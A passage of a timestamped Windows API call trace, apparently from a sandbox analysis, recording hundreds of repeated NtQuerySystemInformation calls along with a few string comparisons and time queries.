SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.799] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd1d0, Length=0x28, ResultLength=0x0) [0227.799] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.799] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.799] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd330, Length=0x38, ResultLength=0x0) [0227.799] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.799] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd250, Length=0x28, ResultLength=0x0) [0227.801] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.801] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.801] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.801] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.802] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.802] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.802] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd250, Length=0x28, ResultLength=0x0) [0227.802] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.802] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.802] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd330, Length=0x38, ResultLength=0x0) [0227.802] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd1b0, Length=0x20, ResultLength=0x0) [0227.802] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd130, Length=0x20, ResultLength=0x0) [0227.802] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.802] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd130, Length=0x20, ResultLength=0x0) [0227.802] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.802] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd130, Length=0x20, ResultLength=0x0) [0227.802] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.802] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.802] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.803] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.803] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd330, Length=0x38, ResultLength=0x0) [0227.803] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd1b0, Length=0x20, ResultLength=0x0) [0227.803] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd140, Length=0x20, ResultLength=0x0) [0227.803] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.803] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.803] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.803] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd140, Length=0x20, ResultLength=0x0) [0227.803] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.803] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.803] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.803] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.803] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.803] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.803] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.804] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.804] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.804] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd718, Length=0x50, ResultLength=0x0) [0227.804] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd690, Length=0x28, ResultLength=0x0) [0227.804] _wcsicmp (_String1="SPPSVC\\55c92734-d682-4d71-983e-d6ec3f16059f", _String2="__##USERSEP##\\$$_RESERVED_$$\\NAMESPACE__") returned 20 [0227.804] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.804] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.804] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd718, Length=0x50, ResultLength=0x0) [0227.804] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.804] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd718, Length=0x50, ResultLength=0x0) [0227.804] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd600, Length=0x50, ResultLength=0x0) [0227.804] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd580, Length=0x28, ResultLength=0x0) [0227.804] _wcsicmp (_String1="SPPSVC\\55c92734-d682-4d71-983e-d6ec3f16059f", _String2="__##USERSEP##\\$$_RESERVED_$$\\NAMESPACE__") returned 20 [0227.804] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.804] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.805] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd600, Length=0x50, ResultLength=0x0) [0227.805] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.805] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd600, Length=0x50, ResultLength=0x0) [0227.805] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.805] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd600, Length=0x50, ResultLength=0x0) [0227.805] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.805] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd530, Length=0x38, ResultLength=0x0) [0227.807] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.808] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd360, Length=0x28, ResultLength=0x0) [0227.808] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.808] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.808] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd360, Length=0x28, ResultLength=0x0) [0227.808] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.808] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.808] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd360, Length=0x28, ResultLength=0x0) [0227.808] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.808] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.808] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd3d0, Length=0x28, ResultLength=0x0) [0227.809] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.809] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.809] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd530, Length=0x38, ResultLength=0x0) [0227.809] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.809] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd450, Length=0x28, ResultLength=0x0) [0227.812] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.812] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.813] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.813] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.813] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.813] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.813] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd450, Length=0x28, ResultLength=0x0) [0227.813] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.813] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.813] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd530, Length=0x38, ResultLength=0x0) [0227.813] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd3b0, Length=0x20, ResultLength=0x0) [0227.813] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd330, Length=0x20, ResultLength=0x0) [0227.813] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.813] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd330, Length=0x20, ResultLength=0x0) [0227.813] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.813] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd330, Length=0x20, ResultLength=0x0) [0227.814] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.814] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.814] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.814] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.814] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd530, Length=0x38, ResultLength=0x0) [0227.814] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd3b0, Length=0x20, ResultLength=0x0) [0227.814] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd340, Length=0x20, ResultLength=0x0) [0227.814] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.814] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.814] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.814] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd340, Length=0x20, ResultLength=0x0) [0227.814] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.814] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.814] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.814] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.815] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.815] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.815] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xc7520fd660 | out: lpSystemTimeAsFileTime=0xc7520fd660*(dwLowDateTime=0xe90f8df0, dwHighDateTime=0x1d5fb6e)) [0227.815] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.815] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd718, Length=0x50, ResultLength=0x0) [0227.815] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd650, Length=0x28, ResultLength=0x0) [0227.815] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd568, Length=0x50, ResultLength=0x0) [0227.815] GetTickCount () returned 0x117984b [0227.815] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd438, Length=0x58, ResultLength=0x0) [0227.815] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.815] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd350, Length=0x38, ResultLength=0x0) [0227.817] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.817] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd180, Length=0x28, ResultLength=0x0) [0227.817] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.817] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.817] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd180, Length=0x28, ResultLength=0x0) [0227.817] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.817] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.818] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd180, Length=0x28, ResultLength=0x0) [0227.818] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.818] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.818] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd180, Length=0x28, ResultLength=0x0) [0227.818] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.818] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.818] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd1f0, Length=0x28, ResultLength=0x0) [0227.818] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.818] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.818] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd350, Length=0x38, ResultLength=0x0) [0227.818] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.818] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd270, Length=0x28, ResultLength=0x0) [0227.821] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.821] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.821] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.821] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.821] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.821] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd270, Length=0x28, ResultLength=0x0) [0227.822] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.822] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.822] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd350, Length=0x38, ResultLength=0x0) [0227.822] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd1d0, Length=0x20, ResultLength=0x0) [0227.822] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd150, Length=0x20, ResultLength=0x0) [0227.822] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.822] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd150, Length=0x20, ResultLength=0x0) [0227.822] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.822] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd150, Length=0x20, ResultLength=0x0) [0227.822] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.822] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.822] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.822] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.822] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd350, Length=0x38, ResultLength=0x0) [0227.822] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd1d0, Length=0x20, ResultLength=0x0) [0227.822] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd160, Length=0x20, ResultLength=0x0) [0227.823] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.823] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.823] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.823] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd160, Length=0x20, ResultLength=0x0) [0227.823] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.823] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.823] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.823] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.823] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.824] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd438, Length=0x58, ResultLength=0x0) [0227.824] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.824] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd310, Length=0x38, ResultLength=0x0) [0227.826] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.826] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.828] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.828] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.828] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd150, Length=0x28, ResultLength=0x0) [0227.828] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.828] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.829] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd150, Length=0x28, ResultLength=0x0) [0227.829] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.829] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.829] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd150, Length=0x28, ResultLength=0x0) [0227.829] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.829] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.829] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd150, Length=0x28, ResultLength=0x0) [0227.829] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.829] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.829] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd1c0, Length=0x28, ResultLength=0x0) [0227.829] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.829] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.829] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd310, Length=0x38, ResultLength=0x0) [0227.830] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.830] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd310, Length=0x38, ResultLength=0x0) [0227.830] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.830] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd240, Length=0x28, ResultLength=0x0) [0227.832] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.832] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.832] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.832] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.832] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.833] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd240, Length=0x28, ResultLength=0x0) [0227.833] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.833] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.833] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd310, Length=0x38, ResultLength=0x0) [0227.833] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.833] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd310, Length=0x38, ResultLength=0x0) [0227.833] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.833] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.833] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.833] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.833] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.833] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd0b0, Length=0x20, ResultLength=0x0) [0227.834] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd030, Length=0x20, ResultLength=0x0) [0227.834] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.834] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd030, Length=0x20, ResultLength=0x0) [0227.834] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.834] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd030, Length=0x20, ResultLength=0x0) [0227.834] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.834] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.834] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.834] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd280, Length=0x20, ResultLength=0x0) [0227.834] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.834] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.834] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd310, Length=0x38, ResultLength=0x0) [0227.834] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd1a0, Length=0x20, ResultLength=0x0) [0227.834] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd120, Length=0x20, ResultLength=0x0) [0227.834] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.834] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd120, Length=0x20, ResultLength=0x0) [0227.834] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.835] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd120, Length=0x20, ResultLength=0x0) [0227.835] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.835] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.835] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.835] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.835] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd310, Length=0x38, ResultLength=0x0) [0227.835] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd1a0, Length=0x20, ResultLength=0x0) [0227.835] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd120, Length=0x20, ResultLength=0x0) [0227.835] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.835] NtQuerySystemInformation (SystemInformationClass=0xb9, 